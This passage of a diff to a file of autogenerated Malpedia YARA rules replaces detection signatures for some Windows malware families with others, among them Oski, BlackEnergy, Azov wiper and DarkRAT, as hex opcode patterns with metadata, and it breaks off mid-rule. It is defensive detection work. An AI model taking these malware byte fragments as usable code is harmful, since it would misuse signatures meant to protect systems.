-		$sequence_7 = { c645f277 c645f377 c645f46e c645f56c c645f67d }
-		$sequence_8 = { 488905???????? c7458017000000 8b4580 3448 }
-		$sequence_9 = { c6456800 33d2 41b808010000 488d8d20020000 e8???????? 498d8680bc0000 }
+		$sequence_0 = { 5d c3 8b04c5d4ca0010 5d c3 8bff 55 }
+		$sequence_1 = { 83c002 6685c9 75f5 8b8d14fbffff 2bc2 }
+		$sequence_2 = { 8b748104 40 6a64 8945e8 ff15???????? 3bf3 }
+		$sequence_3 = { 8bc3 c1f805 8d3c85a0330110 8bf3 83e61f c1e606 }
+		$sequence_4 = { a3???????? a1???????? c705????????ee5c0010 8935???????? a3???????? }
+		$sequence_5 = { 2bc1 8d8df0efffff 51 8bc8 e8???????? 8b35???????? 83c404 }
+		$sequence_6 = { 52 51 d1f8 50 8d9524ffffff }
+		$sequence_7 = { 85c0 743a 8b55ec 52 ff15???????? 8bf8 }
+		$sequence_8 = { 0f84d5000000 8b95e8efffff 53 8d85dcefffff 50 }
+		$sequence_9 = { ff15???????? eb10 c745da64006c00 b96c000000 66894dde }
 
 	condition:
-		7 of them and filesize < 156672
+		7 of them and filesize < 134144
 }
-rule MALPEDIA_Win_Polyvice_Auto : FILE
+rule MALPEDIA_Win_Fusiondrive_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "a1ddf89c-1c54-5551-99ab-406b8afd6790"
+		id = "ca3c35ba-09cb-56c8-bbe3-749cd9839eab"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.polyvice"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.polyvice_auto.yar#L1-L131"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.fusiondrive"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.fusiondrive_auto.yar#L1-L124"
 		license_url = "N/A"
-		logic_hash = "2b6e9e23b007599969dc0f145dba20938a3646054daf998e366135a635120584"
+		logic_hash = "5e3043a82407e5acc0770d68c274349d0da53277a8b1605e4ac140328403150c"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -97827,32 +98107,32 @@ rule MALPEDIA_Win_Polyvice_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { c1c207 4431c2 01ca 4489c9 c1c902 01d6 4189c8 }
-		$sequence_1 = { 41d1c1 4589ca 4589c1 4109f9 21fd 448954240c 4121c9 }
-		$sequence_2 = { 4c897c2420 e8???????? 488b0d???????? 4989c4 ffd3 488b2d???????? }
-		$sequence_3 = { 4489ef c1ef0a 4589d5 31f8 4531dd 01c2 4489e8 }
-		$sequence_4 = { 5b 5e 5f 5d c3 488d0de5a90100 41b804010000 }
-		$sequence_5 = { 41895120 0fb710 0fb64002 6641895125 41884127 488b443c48 }
-		$sequence_6 = { c1e80a 4131c6 4489d0 4189da 438d143e 21d8 41c1ca06 }
-		$sequence_7 = { 4131c0 4521d0 41c1ca02 4131d0 8d942a9979825a 4101c8 4489c9 }
-		$sequence_8 = { 4c8d0526d40000 c1e008 31c3 89f8 c1e818 0fb6d3 458b1c82 }
-		$sequence_9 = { 664139dc 0f46d9 83c201 0fb7c2 4439f0 7cdc }
+		$sequence_0 = { 33db 4c8d35e14effff 4885db 750d 488bc7 498784f660de0100 eb1e }
+		$sequence_1 = { 4883ec28 488d0d75c60100 e8???????? 488d0da9f50000 4883c428 e9???????? }
+		$sequence_2 = { 660f6f05???????? f30f7f442470 66c745806557 c6458200 488d542470 488bc8 ff15???????? }
+		$sequence_3 = { 488dac2450feffff 4881ecb0020000 488b05???????? 4833c4 488985a0010000 4032ff }
+		$sequence_4 = { 4883c907 33ed 483bcf 7606 }
+		$sequence_5 = { 41894018 0fb60a 83e10f 4a0fbe8409a8150100 428a8c09b8150100 482bd0 8b42fc }
+		$sequence_6 = { e8???????? 488d0da9f50000 4883c428 e9???????? 4053 }
+		$sequence_7 = { 488d5202 83f902 72ea c605????????00 }
+		$sequence_8 = { 776a e8???????? 85c0 7428 85db 7524 488d0d92a30100 }
+		$sequence_9 = { 4c8d05e3e90000 83e23f 488bcf 48c1f906 488d14d2 498b0cc8 c644d13800 }
 
 	condition:
-		7 of them and filesize < 369664
+		7 of them and filesize < 290816
 }
-rule MALPEDIA_Win_Babar_Auto : FILE
+rule MALPEDIA_Win_Azov_Wiper_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "b29cd175-863b-5025-9e64-c8f5753d1c62"
+		id = "9d3c9489-8494-515f-a851-2efd685c079b"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.babar"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.babar_auto.yar#L1-L162"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.azov_wiper"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.azov_wiper_auto.yar#L1-L116"
 		license_url = "N/A"
-		logic_hash = "2b221179b5f8ee2ea03d97e07ac34f9970eda994151497ddf7357451a1c3d5d6"
+		logic_hash = "7b55d48ad9f56923d371b84a7be8f9204233f80fc6507fb08d7baa3b93540774"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -97866,38 +98146,32 @@ rule MALPEDIA_Win_Babar_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 3bd6 7505 8d55e0 eb16 }
-		$sequence_1 = { 3bd6 721b 57 8bcb e8???????? 8bc8 }
-		$sequence_2 = { 3bd6 7503 8d5014 895010 }
-		$sequence_3 = { 3bd7 0f8440010000 397e14 0f8437010000 }
-		$sequence_4 = { 46 ddd9 83fe03 ddd8 }
-		$sequence_5 = { 3bd6 7505 8d55d8 eb16 }
-		$sequence_6 = { 3bd7 7215 7704 3bc3 }
-		$sequence_7 = { 3bd6 72d9 33f6 eb08 }
-		$sequence_8 = { 7506 807a0100 751c 8bc6 83c301 }
-		$sequence_9 = { 83c104 5f 8bc1 2b442414 5e c60100 }
-		$sequence_10 = { eb4b 8b4c2428 55 6800014004 55 55 55 }
-		$sequence_11 = { 8b5308 8b03 8bf9 33fa }
-		$sequence_12 = { 89542448 ffd5 50 53 ff15???????? 85c0 }
-		$sequence_13 = { 8b15???????? 5f 895608 8bc6 5e 8b8c2408060000 33cc }
-		$sequence_14 = { 8d442418 50 6a00 57 51 }
-		$sequence_15 = { 0fb65002 83e23f 0fb61432 885103 83c003 83c104 }
+		$sequence_0 = { 4883ef01 75e6 488b05???????? 33c9 488b10 }
+		$sequence_1 = { 741e 488b05???????? bafe010000 488bcb 4c8b00 }
+		$sequence_2 = { 4889442420 41ff9258010000 488b8c2470080000 4885c9 7410 488b05???????? }
+		$sequence_3 = { 4c8b10 4883c8ff 0f1f00 66837c410200 488d4001 75f4 }
+		$sequence_4 = { 488d55f3 ffd0 4883ec08 48c7042400000000 }
+		$sequence_5 = { 488b0b 488b10 ff5250 488d5b08 4883ef01 75e6 488b05???????? }
+		$sequence_6 = { 488bce 4c8b10 41ff5240 4885c0 }
+		$sequence_7 = { 498943e0 488d055cfbffff 498943e8 488b05???????? 488bce }
+		$sequence_8 = { 488b3d???????? f20f10842460020000 488b4710 f20f5c4004 660f2f400c 7310 }
+		$sequence_9 = { 488b05???????? 498d8f00040000 48895c2430 4533c9 }
 
 	condition:
-		7 of them and filesize < 1294336
+		7 of them and filesize < 73728
 }
-rule MALPEDIA_Win_Gpcode_Auto : FILE
+rule MALPEDIA_Win_Kutaki_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "2b18987b-bc80-5fc9-83bb-027c69a960bd"
+		id = "c0ce7f5d-750c-52b1-ad8e-d94947241870"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.gpcode"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.gpcode_auto.yar#L1-L176"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.kutaki"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.kutaki_auto.yar#L1-L130"
 		license_url = "N/A"
-		logic_hash = "05e954eda4e4590590475795b2183e3631e7aeea469ee6afc7d69c80e137d118"
+		logic_hash = "2d6337f5a069ed263b69e96c0f4411506a5a576a0de1c3fe88d0c7f6f51b0ebe"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -97911,40 +98185,32 @@ rule MALPEDIA_Win_Gpcode_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { a1???????? a3???????? 6800001000 68???????? ff35???????? }
-		$sequence_1 = { 68???????? e8???????? 91 6a00 }
-		$sequence_2 = { e8???????? e8???????? c705????????01000000 c3 55 8bec }
-		$sequence_3 = { 68f4010000 e8???????? 833d????????01 75ed e8???????? }
-		$sequence_4 = { 0f840d020000 a3???????? 68???????? ff35???????? e8???????? 85c0 }
-		$sequence_5 = { a1???????? eb18 8b1d???????? 53 }
-		$sequence_6 = { ff7508 6aff 68???????? ff75f4 ff15???????? }
-		$sequence_7 = { e8???????? 85c0 0f8447020000 a3???????? 68???????? }
-		$sequence_8 = { 23d8 741f 80c141 880d???????? }
-		$sequence_9 = { e8???????? 6a0a 68???????? 6a00 e8???????? 0bc0 7504 }
-		$sequence_10 = { 75dc 85c9 7415 85c0 }
-		$sequence_11 = { a0???????? 2c30 a2???????? eb0a }
-		$sequence_12 = { 53 ff7508 56 50 6802010000 }
-		$sequence_13 = { e9???????? ff75f4 6a08 ff35???????? ff15???????? }
-		$sequence_14 = { 47 46 8a06 84c0 8975f4 }
-		$sequence_15 = { 8bfb 2b7df4 837decff 8955bc 8955c4 }
-		$sequence_16 = { 50 57 ff15???????? 8d45e4 50 }
-		$sequence_17 = { 740c 803f29 7507 c6020f }
+		$sequence_0 = { e8???????? 8945d4 8d55d4 52 8d45cc 50 ff15???????? }
+		$sequence_1 = { ff15???????? 85c0 0f849b020000 8d4ddc 51 ff15???????? 50 }
+		$sequence_2 = { 51 e8???????? c745fc04000000 8b5510 33db 833a00 0f9ec3 }
+		$sequence_3 = { 8b4db4 3b4810 7309 c7458800000000 eb09 ff15???????? }
+		$sequence_4 = { 8d953cffffff 52 6808200000 ff15???????? 898564feffff 8d8564feffff 50 }
+		$sequence_5 = { ffd7 a1???????? 6685f6 0f8dfd000000 85c0 7515 68???????? }
+		$sequence_6 = { 50 ff15???????? 898548ffffff eb0a c78548ffffff00000000 833d????????00 751c }
+		$sequence_7 = { 68???????? c78570ffffff01000000 c78568ffffff02000000 ffd6 68???????? 66898560ffffff c78558ffffff02000000 }
+		$sequence_8 = { 8985a4feffff 83bda4feffff00 7d26 68a0000000 }
+		$sequence_9 = { 8b957cffffff 52 ff15???????? 898518ffffff eb0a c78518ffffff00000000 8b45c8 }
 
 	condition:
-		7 of them and filesize < 761856
+		7 of them and filesize < 1335296
 }
-rule MALPEDIA_Win_Tempedreve_Auto : FILE
+rule MALPEDIA_Win_Blackenergy_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "2db2cfb5-7120-5d3b-b0b8-3bdd15ee2814"
+		id = "62fd91e5-385e-5b2b-8f41-0f60c4fa0e69"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.tempedreve"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.tempedreve_auto.yar#L1-L163"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.blackenergy"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.blackenergy_auto.yar#L1-L123"
 		license_url = "N/A"
-		logic_hash = "81da1ba35c5682d2618815158fab067de40d7a4b67ee1d7e4df00dcd82c55387"
+		logic_hash = "4b4bc961d280588360830fea0a66046ffbc4c49bb89c22238ddcc6fa38fb42f9"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -97958,38 +98224,32 @@ rule MALPEDIA_Win_Tempedreve_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 663bfb 7407 663b7c2448 7520 0fb77804 }
-		$sequence_1 = { 8d5602 03d1 e9???????? 807dfe80 751e 8a4101 24f8 }
-		$sequence_2 = { 83c40c ab 55 8d84247c0e0000 50 }
-		$sequence_3 = { 0f85c8020000 0fb74314 55 56 0fb77306 }
-		$sequence_4 = { 740e 80fb12 7511 8a4101 24c0 }
-		$sequence_5 = { 8a1c1e 8d42d0 46 32c9 3c09 }
-		$sequence_6 = { 015308 f7d0 0bc2 33c6 }
-		$sequence_7 = { ff743bfc 8bcb ff743bf8 e8???????? }
-		$sequence_8 = { 0f85c9000000 8b542430 3bda 7320 8d4d02 }
-		$sequence_9 = { c0e801 7434 83d102 89c5 }
-		$sequence_10 = { 2bc8 894c2414 3b4c242c 0f8738010000 8b4c2410 }
-		$sequence_11 = { c1e903 8d440140 c20400 8b44240c }
-		$sequence_12 = { d1c0 33c7 0fb6b90130cb00 d1c0 }
-		$sequence_13 = { 3a1429 8b4c2414 bb02000000 740c 3b8e24040000 0f85c9000000 }
-		$sequence_14 = { 0f846b010000 83ff01 0f8650010000 8b542454 8bcf 2bcb 8d0411 }
-		$sequence_15 = { f7d0 8944241c 61 c20800 60 8b742424 }
+		$sequence_0 = { 89430c 8bc3 5f 5b }
+		$sequence_1 = { 56 e8???????? 8bf0 85f6 7417 56 6a00 }
+		$sequence_2 = { e8???????? 85c0 0f848c130000 8945b4 8b7508 8b7d10 8b4d0c }
+		$sequence_3 = { c70200000000 8b5104 0bd2 7407 c7420800000000 5a }
+		$sequence_4 = { 49 8bc3 2bc1 40 5b 5f 8bd0 }
+		$sequence_5 = { 53 e8???????? 6a00 ffd0 8b5f3c 8365c800 }
+		$sequence_6 = { 47 38e0 74f1 3bca 7602 }
+		$sequence_7 = { ff15???????? c3 55 8bec 81ec08010000 8365fc00 57 }
+		$sequence_8 = { 83f905 770b c745f409000000 33c9 }
+		$sequence_9 = { ff75c4 51 6a00 ff7514 56 ff7508 }
 
 	condition:
-		7 of them and filesize < 155648
+		7 of them and filesize < 98304
 }
-rule MALPEDIA_Win_Albaniiutas_Auto : FILE
+rule MALPEDIA_Win_Doubleback_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "6944bcab-7fa1-5041-889b-6d1c7305340e"
+		id = "035a9a1e-c37c-5062-9628-749c129d60a8"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.albaniiutas"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.albaniiutas_auto.yar#L1-L114"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.doubleback"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.doubleback_auto.yar#L1-L117"
 		license_url = "N/A"
-		logic_hash = "ae4d05366f3510708fa40872966a48e3078a4c97e3d0950cdaf94819ee9ab7c6"
+		logic_hash = "3ec9aa1fddb06b8b6c176677c7cb9e9e3472c33e097d5e85291d462774406acd"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -98003,71 +98263,71 @@ rule MALPEDIA_Win_Albaniiutas_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { c745e410000000 c705????????02000000 c745e802000000 c745ec07000000 c745f000000000 }
-		$sequence_1 = { 03048d90df0210 50 ff15???????? 5d }
-		$sequence_2 = { 83c40c 5d c20c00 e9???????? 55 8bec ff7508 }
-		$sequence_3 = { 56 8b048d90df0210 57 8b7d10 }
-		$sequence_4 = { 8b049590df0210 f644082801 7421 57 e8???????? 59 50 }
-		$sequence_5 = { 8975ec 0fb70445b01a0110 66894c4774 8bcf }
-		$sequence_6 = { 0f8e6fffffff 83c8ff eb07 8b04cd4c6b0110 }
-		$sequence_7 = { 8b4508 c740183c1b0110 c74104513f0000 e9???????? }
-		$sequence_8 = { 8b4508 c74018241c0110 e9???????? 8b550c c74104473f0000 83fa06 0f8430070000 }
-		$sequence_9 = { c74048c0a40110 8b4508 6689486c 8b4508 }
+		$sequence_0 = { b947060000 eb49 b9e7050000 eb42 b9e3050000 eb3b }
+		$sequence_1 = { b947060000 eb49 b9e7050000 eb42 }
+		$sequence_2 = { 3d00280000 7438 3d5a290000 742a 3d39380000 741c 3dd73a0000 }
+		$sequence_3 = { b9d4070000 eb13 b975070000 eb0c b96f070000 eb05 }
+		$sequence_4 = { e8???????? 85c0 7508 c60703 }
+		$sequence_5 = { b9e3050000 eb3b b90b070000 eb34 2d63450000 7428 }
+		$sequence_6 = { eb49 b9e7050000 eb42 b9e3050000 eb3b b90b070000 eb34 }
+		$sequence_7 = { b975070000 eb0c b96f070000 eb05 }
+		$sequence_8 = { b9d4070000 eb13 b975070000 eb0c b96f070000 }
+		$sequence_9 = { 751a b9d4070000 eb13 b975070000 }
 
 	condition:
-		7 of them and filesize < 566272
+		7 of them and filesize < 106496
 }
-rule MALPEDIA_Win_Billgates_Auto : FILE
+rule MALPEDIA_Win_Unidentified_094_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "936ce7c3-e0bc-5e8a-a94c-d204107ad6c9"
-		date = "2026-01-05"
-		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.billgates"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.billgates_auto.yar#L1-L118"
+		id = "f5bdd8f3-d974-5222-9555-3631072a29c0"
+		date = "2023-12-06"
+		modified = "2023-12-08"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_094"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.unidentified_094_auto.yar#L1-L118"
 		license_url = "N/A"
-		logic_hash = "0d1344c595e66a8a3fe952afc687de569fadd20ac0c050f652fba5100e4b414d"
+		logic_hash = "f3d0ed91e99c9ab03a6ddd24a2a28007a40b7e677077c8b725a5a67f32cc52a7"
 		score = 75
 		quality = 75
 		tags = "FILE"
 		version = "1"
 		tool = "yara-signator v0.6.0"
 		signator_config = "callsandjumps;datarefs;binvalue"
-		malpedia_rule_date = "20260105"
-		malpedia_hash = "19b79e7cab4eaf532122e5b45a77dd8f6bb5cc79"
-		malpedia_version = "20251219"
+		malpedia_rule_date = "20231130"
+		malpedia_hash = "fc8a0e9f343f6d6ded9e7df1a64dac0cc68d7351"
+		malpedia_version = "20230808"
 		malpedia_license = "CC BY-SA 4.0"
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 7408 3c22 7404 3c30 7504 }
-		$sequence_1 = { 3c21 7408 3c23 7404 3c24 }
-		$sequence_2 = { 7404 3c58 7507 b802000000 eb02 }
-		$sequence_3 = { 740c 3c11 7408 3c22 7404 3c30 7504 }
-		$sequence_4 = { 3c11 7408 3c22 7404 3c30 7504 }
-		$sequence_5 = { 3c21 7408 3c23 7404 }
-		$sequence_6 = { ff15???????? 83f8ff 7508 ff15???????? f7d8 85c0 }
-		$sequence_7 = { 3c10 740c 3c11 7408 3c22 7404 3c30 }
-		$sequence_8 = { 740c 3c11 7408 3c22 7404 }
-		$sequence_9 = { 3c10 740c 3c11 7408 }
+		$sequence_0 = { 890d???????? 57 8915???????? a3???????? 83ceff b9???????? }
+		$sequence_1 = { 6a5c 68???????? e8???????? 83c408 33c9 }
+		$sequence_2 = { 0fb65004 3015???????? 0fb64805 300d???????? 0fb65006 3015???????? }
+		$sequence_3 = { 83c310 ff4d0c 0f857ffeffff 5f }
+		$sequence_4 = { 0fb65004 3015???????? 0fb64805 300d???????? 0fb65006 3015???????? c3 }
+		$sequence_5 = { 884dff 84d2 7902 341b }
+		$sequence_6 = { 3055fd 0fb61401 3055fe 0fb6540101 3055ff 8b55fc 89540102 }
+		$sequence_7 = { 6a00 6a00 6a00 ff15???????? c3 }
+		$sequence_8 = { 80f31b 8ad3 02d2 84db 7903 80f21b }
+		$sequence_9 = { 890d???????? 57 8915???????? a3???????? }
 
 	condition:
-		7 of them and filesize < 801792
+		7 of them and filesize < 524288
 }
-rule MALPEDIA_Win_Oski_Auto : FILE
+rule MALPEDIA_Win_Moonwind_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "5c71af2a-ab1c-54b1-b031-9d62fe7b8e58"
+		id = "b9622b32-c792-5aeb-a059-5721d1f27a2f"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.oski"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.oski_auto.yar#L1-L184"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.moonwind"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.moonwind_auto.yar#L1-L130"
 		license_url = "N/A"
-		logic_hash = "6e592abd5f7946bd0b6a43d8ee0af2b699a6055e4a91c9728a4df01ede6824ac"
+		logic_hash = "6d3886946e413d262cc391b5e8605e5201d1334018954f9d8c7fe7ffb4921df3"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -98081,39 +98341,32 @@ rule MALPEDIA_Win_Oski_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 50 a1???????? 50 8d8df0feffff 51 e8???????? }
-		$sequence_1 = { 25ff7f0000 c3 8bff 55 8bec 83ec14 ff7510 }
-		$sequence_2 = { 83c40c e8???????? 50 a1???????? 50 }
-		$sequence_3 = { 8975f0 e8???????? cc 8bff 55 8bec 8b550c }
-		$sequence_4 = { 393d???????? 0f94c0 33d2 0bc8 }
-		$sequence_5 = { 57 e8???????? 8b4618 83c40c 6a00 6a00 }
-		$sequence_6 = { 56 8d85ecfeffff 50 8d8dd0fcffff 51 eb18 f685a4fcffff10 }
-		$sequence_7 = { 8b4508 8945b0 8b450c 33db 8bc8 }
-		$sequence_8 = { f3c3 e9???????? 8bff 55 8bec 83ec1c a1???????? }
-		$sequence_9 = { ebe9 6a02 e8???????? 59 c3 e8???????? }
-		$sequence_10 = { 8b5508 52 a1???????? 50 8d8de8fdffff }
-		$sequence_11 = { 51 e8???????? 83c40c 8985e4fdffff 83bde4fdffff00 }
-		$sequence_12 = { e8???????? 83c404 8b0d???????? 51 ff15???????? a3???????? }
-		$sequence_13 = { 8b511c 83c220 52 6a00 }
-		$sequence_14 = { 52 6a00 68???????? ff15???????? 8945f0 837df000 }
-		$sequence_15 = { 83c404 8b55f8 8955f4 8b45f4 50 e8???????? 83c404 }
-		$sequence_16 = { 51 6800020000 8b55f4 52 ff15???????? 8945f0 }
+		$sequence_0 = { b90f000000 f3ab 83c308 b800000000 }
+		$sequence_1 = { 83c404 03d8 895dec 8965e8 6828000000 8b45f0 50 }
+		$sequence_2 = { 3965a8 740d 6806000000 e8???????? 83c404 50 8b5da4 }
+		$sequence_3 = { 83c404 8b45ec 50 8b1d???????? 85db 7409 53 }
+		$sequence_4 = { e8???????? 83c428 8945ac 8b45ac 50 8b5dd8 53 }
+		$sequence_5 = { 68000000c0 ff750c e8???????? a3???????? 833d????????ff 0f84b2000000 e8???????? }
+		$sequence_6 = { 6824000000 e8???????? 83c404 a3???????? 8bd8 8bf8 }
+		$sequence_7 = { 8b5d08 8b1b 83c304 895dfc 8965f8 6805000000 8b5dfc }
+		$sequence_8 = { 53 8903 8bd8 c70300000000 c7430400000000 5b 8b5d08 }
+		$sequence_9 = { 51 8d542478 8944247c 6a00 52 40 6a00 }
 
 	condition:
-		7 of them and filesize < 423936
+		7 of them and filesize < 1417216
 }
-rule MALPEDIA_Win_Homefry_Auto : FILE
+rule MALPEDIA_Win_Lyposit_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "d7d35e8c-e0c5-5ba6-b2d4-e95c77830765"
+		id = "c947693c-fdb4-5804-b039-d3be391d589e"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.homefry"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.homefry_auto.yar#L1-L119"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.lyposit"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.lyposit_auto.yar#L1-L127"
 		license_url = "N/A"
-		logic_hash = "3f2d14189cc000f371864eda6ce01209469d1d59387364413aee3876a7479356"
+		logic_hash = "1aae27919b7142f3a956ce5a03df97f5716bf7d507962564bd1a349d0184cbbf"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -98127,32 +98380,32 @@ rule MALPEDIA_Win_Homefry_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 4157 4883ec20 4c8b7908 0fb701 4d8bf0 410fb61f 4c8bda }
-		$sequence_1 = { c744246038020000 ff15???????? 85c0 751d }
-		$sequence_2 = { 410fb61f 4c8bda 83f801 7623 }
-		$sequence_3 = { 488905???????? ff15???????? 488b0d???????? 448b4c2470 4c8b05???????? 488b15???????? }
-		$sequence_4 = { ffd5 85c0 0f8860010000 488b0d???????? 458d4e20 4c8d05480f0000 488b09 }
-		$sequence_5 = { e9???????? 480578ffffff 833d????????06 488905???????? }
-		$sequence_6 = { 751c 488d0d8f060000 488b742440 488b7c2448 4883c420 415e }
-		$sequence_7 = { 7343 0f1f8000000000 4983c9ff 488bd7 488bcb }
-		$sequence_8 = { 488917 48630a 4883c104 4803ca 48890f }
-		$sequence_9 = { 742e 48ffc3 483bdd 72d0 488bcf ff15???????? 33c0 }
+		$sequence_0 = { 68???????? e8???????? 8b5d10 8365fc00 6a1c 6a40 ff15???????? }
+		$sequence_1 = { 53 ff15???????? 85c0 742a 6aff ff75c0 ff15???????? }
+		$sequence_2 = { 83c410 85c0 7424 8b4ddc 8a01 3c31 7504 }
+		$sequence_3 = { 8b0f e8???????? 59 59 0337 }
+		$sequence_4 = { 52 50 ff91d0000000 8d45e4 50 ff15???????? ebd3 }
+		$sequence_5 = { 66a3???????? 8be5 5d c3 6a14 68???????? e8???????? }
+		$sequence_6 = { 84d2 7407 838b0c02000020 807dff00 7407 }
+		$sequence_7 = { ff75e4 ff7604 ff36 ff7508 e8???????? }
+		$sequence_8 = { 8b45fc ebd0 53 55 33db 33ed }
+		$sequence_9 = { ff75e4 ff15???????? 85c0 7425 6a0b 56 ff75d8 }
 
 	condition:
-		7 of them and filesize < 65536
+		7 of them and filesize < 466944
 }
-rule MALPEDIA_Win_Darkrat_Auto : FILE
+rule MALPEDIA_Win_Nozelesn_Decryptor_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "23e37317-8228-5897-b34f-5636920d388d"
+		id = "d81a4891-2ccb-5a37-a1c9-3cb6dc4ddf54"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.darkrat"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.darkrat_auto.yar#L1-L121"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.nozelesn_decryptor"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.nozelesn_decryptor_auto.yar#L1-L130"
 		license_url = "N/A"
-		logic_hash = "c66a4bb6e3f6849fe471570a3e9ab067b886ef3521f3b46d24057084154fb02f"
+		logic_hash = "df00466a0b451868376ca8f8e40a817d0c669175deb69c467a31b881c85a7c54"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -98166,32 +98419,32 @@ rule MALPEDIA_Win_Darkrat_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 83c408 837b100a 8b7dd4 0f8514ffffff 8b55ec }
-		$sequence_1 = { e8???????? 83c408 c745e800000000 8d4dd8 }
-		$sequence_2 = { 51 56 e8???????? 83c40c c6043e00 eb17 57 }
-		$sequence_3 = { 72bd 8b4d08 42 8bc1 81fa00100000 72a5 8b49fc }
-		$sequence_4 = { 7435 6a13 68???????? 8bcb }
